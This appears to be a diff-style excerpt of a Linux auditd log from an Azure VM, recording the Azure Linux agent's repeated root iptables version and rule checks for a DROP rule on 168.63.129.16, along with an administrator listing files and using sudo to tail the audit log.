+type=PATH msg=audit(1551487469.997:824): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487469.997:824): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487469.997:824): proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=SYSCALL msg=audit(1551487469.997:825): arch=c000003e syscall=59 success=yes exit=0 a0=5592265c77e0 a1=5592265c7728 a2=5592265c77b0 a3=7f0562f44810 items=2 ppid=19253 pid=19254 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487469.997:825): argc=16 a0="iptables" a1="-w" a2="-t" a3="security" a4="-C" a5="OUTPUT" a6="-d" a7="168.63.129.16" a8="-p" a9="tcp" a10="-m" a11="conntrack" a12="--ctstate" a13="INVALID,NEW" a14="-j" a15="DROP"
+type=CWD msg=audit(1551487469.997:825): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487469.997:825): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487469.997:825): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487469.997:825): proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50
+type=SYSCALL msg=audit(1551487475.009:826): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0662d970 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19256 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487475.009:826): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D2D76657273696F6E
+type=CWD msg=audit(1551487475.009:826): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487475.009:826): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487475.009:826): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487475.009:826): proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E
+type=SYSCALL msg=audit(1551487475.009:827): arch=c000003e syscall=59 success=yes exit=0 a0=5578943debb8 a1=5578943deb70 a2=5578943deb88 a3=7f089c1db810 items=2 ppid=19256 pid=19257 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487475.009:827): argc=2 a0="iptables" a1="--version"
+type=CWD msg=audit(1551487475.009:827): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487475.009:827): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487475.009:827): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487475.009:827): proctitle=69707461626C6573002D2D76657273696F6E
+type=SYSCALL msg=audit(1551487475.009:828): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0662d970 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19258 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487475.009:828): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=CWD msg=audit(1551487475.009:828): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487475.009:828): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487475.009:828): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487475.009:828): proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=SYSCALL msg=audit(1551487475.013:829): arch=c000003e syscall=59 success=yes exit=0 a0=55cab48657e0 a1=55cab4865728 a2=55cab48657b0 a3=7fb852254810 items=2 ppid=19258 pid=19259 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487475.013:829): argc=16 a0="iptables" a1="-w" a2="-t" a3="security" a4="-C" a5="OUTPUT" a6="-d" a7="168.63.129.16" a8="-p" a9="tcp" a10="-m" a11="conntrack" a12="--ctstate" a13="INVALID,NEW" a14="-j" a15="DROP"
+type=CWD msg=audit(1551487475.013:829): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487475.013:829): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487475.013:829): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487475.013:829): proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50
+type=SYSCALL msg=audit(1551487480.025:830): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0685eb50 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19261 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487480.025:830): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D2D76657273696F6E
+type=CWD msg=audit(1551487480.025:830): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487480.025:830): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487480.025:830): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487480.025:830): proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E
+type=SYSCALL msg=audit(1551487480.025:831): arch=c000003e syscall=59 success=yes exit=0 a0=56415a01fbb8 a1=56415a01fb70 a2=56415a01fb88 a3=7fe82f4e8810 items=2 ppid=19261 pid=19262 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487480.025:831): argc=2 a0="iptables" a1="--version"
+type=CWD msg=audit(1551487480.025:831): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487480.025:831): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487480.025:831): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487480.025:831): proctitle=69707461626C6573002D2D76657273696F6E
+type=SYSCALL msg=audit(1551487480.025:832): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0685eb50 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19263 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487480.025:832): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=CWD msg=audit(1551487480.025:832): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487480.025:832): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487480.025:832): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487480.025:832): proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=SYSCALL msg=audit(1551487480.025:833): arch=c000003e syscall=59 success=yes exit=0 a0=561ff9c6a7e0 a1=561ff9c6a728 a2=561ff9c6a7b0 a3=7f5a042c7810 items=2 ppid=19263 pid=19264 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487480.025:833): argc=16 a0="iptables" a1="-w" a2="-t" a3="security" a4="-C" a5="OUTPUT" a6="-d" a7="168.63.129.16" a8="-p" a9="tcp" a10="-m" a11="conntrack" a12="--ctstate" a13="INVALID,NEW" a14="-j" a15="DROP"
+type=CWD msg=audit(1551487480.025:833): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487480.025:833): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487480.025:833): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487480.025:833): proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50
+type=SYSCALL msg=audit(1551487483.281:834): arch=c000003e syscall=59 success=yes exit=0 a0=561e083b4df0 a1=561e08472680 a2=561e083cc870 a3=0 items=2 ppid=15564 pid=19265 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=237 comm="ls" exe="/bin/ls" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487483.281:834): argc=2 a0="ls" a1="--color=auto"
+type=CWD msg=audit(1551487483.281:834): cwd="/home/linuxserveradmin"
+type=PATH msg=audit(1551487483.281:834): item=0 name="/bin/ls" inode=26 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487483.281:834): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487483.281:834): proctitle=6C73002D2D636F6C6F723D6175746F
+type=SYSCALL msg=audit(1551487485.037:835): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0685efb0 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19266 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487485.037:835): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D2D76657273696F6E
+type=CWD msg=audit(1551487485.037:835): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487485.037:835): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487485.037:835): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487485.037:835): proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E
+type=SYSCALL msg=audit(1551487485.037:836): arch=c000003e syscall=59 success=yes exit=0 a0=555b5a05bbb8 a1=555b5a05bb70 a2=555b5a05bb88 a3=7f0b63d7f810 items=2 ppid=19266 pid=19267 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487485.037:836): argc=2 a0="iptables" a1="--version"
+type=CWD msg=audit(1551487485.037:836): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487485.037:836): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487485.037:836): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487485.037:836): proctitle=69707461626C6573002D2D76657273696F6E
+type=SYSCALL msg=audit(1551487485.037:837): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0685efb0 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19268 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487485.037:837): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=CWD msg=audit(1551487485.037:837): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487485.037:837): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487485.037:837): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487485.037:837): proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=SYSCALL msg=audit(1551487485.041:838): arch=c000003e syscall=59 success=yes exit=0 a0=55f4222567e0 a1=55f422256728 a2=55f4222567b0 a3=7fee57bba810 items=2 ppid=19268 pid=19269 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487485.041:838): argc=16 a0="iptables" a1="-w" a2="-t" a3="security" a4="-C" a5="OUTPUT" a6="-d" a7="168.63.129.16" a8="-p" a9="tcp" a10="-m" a11="conntrack" a12="--ctstate" a13="INVALID,NEW" a14="-j" a15="DROP"
+type=CWD msg=audit(1551487485.041:838): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487485.041:838): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487485.041:838): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487485.041:838): proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50
+type=SYSCALL msg=audit(1551487488.342:839): arch=c000003e syscall=59 success=yes exit=0 a0=561e08492c40 a1=561e0846e000 a2=561e083cc870 a3=8 items=2 ppid=15564 pid=19270 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=237 comm="sudo" exe="/usr/bin/sudo" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487488.342:839): argc=3 a0="sudo" a1="tail" a2="/var/log/audit/audit.log"
+type=CWD msg=audit(1551487488.342:839): cwd="/home/linuxserveradmin"
+type=PATH msg=audit(1551487488.342:839): item=0 name="/usr/bin/sudo" inode=4359 dev=08:01 mode=0104755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487488.342:839): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487488.342:839): proctitle=7375646F007461696C002F7661722F6C6F672F61756469742F61756469742E6C6F67
+type=USER_CMD msg=audit(1551487488.346:840): pid=19270 uid=1000 auid=1000 ses=237 subj==unconfined msg='cwd="/home/linuxserveradmin" cmd=7461696C202F7661722F6C6F672F61756469742F61756469742E6C6F67 terminal=pts/0 res=success'
+type=CRED_REFR msg=audit(1551487488.346:841): pid=19270 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_START msg=audit(1551487488.346:842): pid=19270 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=SYSCALL msg=audit(1551487488.346:843): arch=c000003e syscall=59 success=yes exit=0 a0=5573a8203958 a1=5573a8203e68 a2=5573a820edb0 a3=0 items=2 ppid=19270 pid=19271 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=237 comm="tail" exe="/usr/bin/tail" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487488.346:843): argc=2 a0="tail" a1="/var/log/audit/audit.log"
+type=CWD msg=audit(1551487488.346:843): cwd="/home/linuxserveradmin"
+type=PATH msg=audit(1551487488.346:843): item=0 name="/usr/bin/tail" inode=4206 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487488.346:843): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487488.346:843): proctitle=7461696C002F7661722F6C6F672F61756469742F61756469742E6C6F67
+type=USER_END msg=audit(1551487488.350:844): pid=19270 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CRED_DISP msg=audit(1551487488.350:845): pid=19270 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=SYSCALL msg=audit(1551487490.050:846): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd068e3290 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19272 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487490.050:846): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D2D76657273696F6E
+type=CWD msg=audit(1551487490.050:846): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487490.050:846): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487490.050:846): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487490.050:846): proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E
+type=SYSCALL msg=audit(1551487490.050:847): arch=c000003e syscall=59 success=yes exit=0 a0=56163cb86bb8 a1=56163cb86b70 a2=56163cb86b88 a3=7fe5fcdc1810 items=2 ppid=19272 pid=19273 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487490.050:847): argc=2 a0="iptables" a1="--version"
+type=CWD msg=audit(1551487490.050:847): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487490.050:847): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487490.050:847): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487490.050:847): proctitle=69707461626C6573002D2D76657273696F6E
+type=SYSCALL msg=audit(1551487490.054:848): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd068e3290 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19274 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487490.054:848): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=CWD msg=audit(1551487490.054:848): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487490.054:848): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487490.054:848): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487490.054:848): proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=SYSCALL msg=audit(1551487490.054:849): arch=c000003e syscall=59 success=yes exit=0 a0=5634b8ec47e0 a1=5634b8ec4728 a2=5634b8ec47b0 a3=7f6df03c1810 items=2 ppid=19274 pid=19275 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487490.054:849): argc=16 a0="iptables" a1="-w" a2="-t" a3="security" a4="-C" a5="OUTPUT" a6="-d" a7="168.63.129.16" a8="-p" a9="tcp" a10="-m" a11="conntrack" a12="--ctstate" a13="INVALID,NEW" a14="-j" a15="DROP"
+type=CWD msg=audit(1551487490.054:849): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487490.054:849): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487490.054:849): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
